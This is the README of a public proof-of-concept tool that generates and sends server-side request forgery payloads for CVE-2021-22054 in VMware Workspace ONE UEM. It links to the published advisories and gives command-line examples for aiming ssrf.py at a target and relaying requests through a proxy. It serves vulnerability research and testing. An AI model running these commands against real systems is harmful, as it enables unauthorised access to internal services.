Generate SSRF payloads# CVE-2021-22054
Generate SSRF payloads
#### References
https://blog.assetnote.io/2022/04/27/advisory-vmware-workspace-one-uem/
https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/
#### Examples
```bash
# generate POC
python3 ssrf.py --url https://target.com --url https://example.com --airwatch
python3 ssrf.py --url https://target.com --url https://example.com
# generate PPOC and send request
python3 ssrf.py --url https://target.com --url https://example.com --airwatch --request --proxy http://127.0.0.1:8080
python3 ssrf.py --url https://target.com --url https://example.com --airwatch --request --method POST --data '{"a":1}' -H 'Content-Type: application/json" --debug-headers
```


[4.0K] /data/pocs/1d450137c9a67a7d3e65980349d1c344873c0cf3
├── [ 935] README.md
├── [ 38] requirements.txt
└── [7.6K] ssrf.py
0 directories, 3 files